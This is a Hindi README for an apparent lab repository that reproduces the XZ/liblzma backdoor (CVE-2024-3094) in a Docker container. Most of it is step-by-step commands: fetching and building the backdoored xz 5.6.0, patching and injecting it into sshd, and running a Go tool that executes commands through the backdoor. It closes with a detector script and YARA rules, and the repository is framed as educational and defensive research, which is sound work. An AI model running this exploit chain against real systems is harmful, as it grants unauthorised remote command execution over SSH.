
एक XZ बैकडोर कमजोरी को विस्तार से समझाया गया
यह परियोजना xz-utils (liblzma) में खोजे गए उच्च-प्रोफ़ाइल बैकडोर का विश्लेषण करती है, जो संस्करण 5.6.0 और 5.6.1 को प्रभावित करता है। अपस्ट्रीम बिल्ड सिस्टम में शामिल किए गए दुर्भावनापूर्ण कोड ने रनटाइम पर sshd के LZMA संपीड़न लाइब्रेरी के साथ इंटरैक्ट करने के तरीके को संशोधित करके SSH प्रमाणीकरण को लक्षित किया।
⚠️ यह परियोजना केवल शैक्षिक और रक्षात्मक अनुसंधान उद्देश्यों के लिए है।
इस रिपॉजिटरी को क्लोन करें
git clone https://github.com/valeriot30/cve-2024-3094
निर्देशिका में जाएं
cd cve-2024-3094
डॉकर कंटेनर चलाएं
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev
लाइब्रेरी का दुर्भावनापूर्ण संस्करण प्राप्त करें
cd ~
git clone https://github.com/thesamesam/xz-archive.git
cd xz-archive/5.6/ # The vulnerable version ( it works as well with 5.6.1 )
tar xzf xz-5.6.0.tar.gz
mv xz-5.6.0 ~
बिल्ड लक्ष्य निर्यात करें
export RPM_ARCH=$(uname -m)
दुर्भावनापूर्ण लाइब्रेरी संकलित करें
cd ~
cd ./xz-5.6.0/
./configure
make -j 8
दुर्भावनापूर्ण SO को बाहर कॉपी करें:
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~
कंटेनर के अंदर रिपॉजिटरी को फिर से क्लोन करें
git clone https://github.com/valeriot30/cve-2024-3094
लिबलज़मा लाइब्रेरी को कस्टम कुंजी से पैच करें
python3 cve-2024-3094/patch.py liblzma.so.5.6.0
सिस्टम में दुर्भावनापूर्ण लाइब्रेरी को लिंक करें
sh cve-2024-3094/inject.sh
दुर्भावनापूर्ण लाइब्रेरी से जुड़े sshd को चलाएँ
env -i LANG=C /usr/sbin/sshd -D &
इस रिपॉजिटरी को क्लोन करें
git clone https://github.com/valeriot30/cve-2024-3094
निर्देशिका में जाएं
cd cve-2024-3094
GO टूल संकलित करें
go build
कमजोर मशीन का IP पता और निष्पादित करने के लिए कमांड डालकर टूल का उपयोग करें
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'
डिटेक्टर चलाएं
sh detector.sh
Yara मिलान नियमों का उपयोग करें
yara rule.yar ../liblzma.so.5.6.0 -s